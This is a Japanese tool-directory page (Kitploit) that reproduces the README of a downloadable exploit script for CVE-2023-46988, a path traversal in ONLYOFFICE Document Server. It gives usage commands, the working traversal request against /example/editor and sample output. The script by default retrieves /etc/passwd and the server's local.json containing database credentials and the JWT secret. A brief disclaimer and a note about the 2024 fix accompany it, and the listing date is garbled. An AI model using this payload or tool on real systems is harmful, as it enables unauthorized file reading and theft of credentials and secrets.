Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
OnlyOffice-path-traversal — CVE-2023-46988: ONLYOFFICE パストラバーサルエクスプロイト | Kitploit
ツール/GitHubGitHub/mihat2/onlyoffice-path-traversal
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト学習と教育
GitHubmihat2/onlyoffice-path-traversal

OnlyOffice-path-traversal

CVE-2023-46988: ONLYOFFICE パストラバーサルエクスプロイト

リポジトリを見る
41年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ONLYOFFICE パストラバーサル Exploit (CVE-2023-46988)

📌 概要

このスクリプトは、ONLYOFFICE Document Server におけるパストラバーサル脆弱性 (CVE-2023-46988) を悪用し、権限のないユーザーがサーバーから任意のファイルをコピーできるようにします。この脆弱性は /example/editor エンドポイントに存在し、fileExt パラメータを操作することで、機密性の高いシステムファイルや設定ファイルにアクセスできます。

⚠️ 免責事項

このツールは教育および許可されたセキュリティ研究目的のみに使用されます。
明示的な許可なくシステムに対して不正に使用することは違法であり、非倫理的です。

🛠 特徴

  • デフォルトの機密ファイルを取得:
    • /etc/passwd
    • /etc/onlyoffice/documentserver/local.json(データベース認証情報とJWTシークレットを含む)
  • --file 引数で任意のファイルパスを指定して取得。
  • Burp Suiteでのインターセプトのためのオプションのプロキシをサポート (--proxy)。
  • オプションのSSL検証をサポート (--verify)。
  • 特殊文字を含むファイルダウンロード時のエンコーディング問題を修正。

🚀 使用方法

1️⃣ 基本的な使用方法 (デフォルトファイルの取得)

python onlyoffice_exploit.py http://localhost

これにより以下が取得されます:

  • /etc/passwd
  • /etc/onlyoffice/documentserver/local.json

2️⃣ カスタムファイルの取得 (例: /etc/hosts)

python onlyoffice_exploit.py http://localhost --file /etc/hosts

3️⃣ プロキシの有効化 (例: Burp Suite on 127.0.0.1:8080)

python onlyoffice_exploit.py http://localhost --proxy
python onlyoffice_exploit.py http://localhost --proxy http://127.0.0.1:8080

4️⃣ SSL検証の有効化

python onlyoffice_exploit.py https://example.local --verify

5️⃣ プロキシとSSL検証の組み合わせ

python onlyoffice_exploit.py https://example.local --file /etc/hosts --proxy --verify

🔍 動作の仕組み

  1. 悪意のある fileExt パラメータを使用して /example/editor にリクエストを送信:
    GET /example/editor?fileExt=../../../../../../../../etc/passwd
    
  2. レスポンスからリダイレクトURLを抽出。
  3. レスポンスからリダイレクト先のファイル名を解析。
  4. ファイル名の特殊文字に関するエンコーディング問題を修正。
  5. /example/download?fileName=<抽出されたファイル名> からファイルをダウンロード。

🛠 出力例

[*] Target URL: http://localhost
[*] Attempting to retrieve: /etc/passwd
[*] Sending request to: http://localhost/example/editor?fileExt=../../../../../../../../etc/passwd
[+] Extracted Redirect URL: http://localhost/example/download?fileName=.passwd
[+] Extracted File Name: .passwd
[*] Downloading file: http://localhost/example/download?fileName=.passwd
[+] File downloaded successfully: .passwd

🔒 対策

ONLYOFFICEは2024年2月のアップデートでこの脆弱性を修正しました。
ユーザーはサーバーを保護するために最新バージョンに更新する必要があります。

🐜 ライセンス

このプロジェクトはMITライセンスの下でライセンスされています。詳細はLICENSEファイルを参照してください。

ツールをダウンロード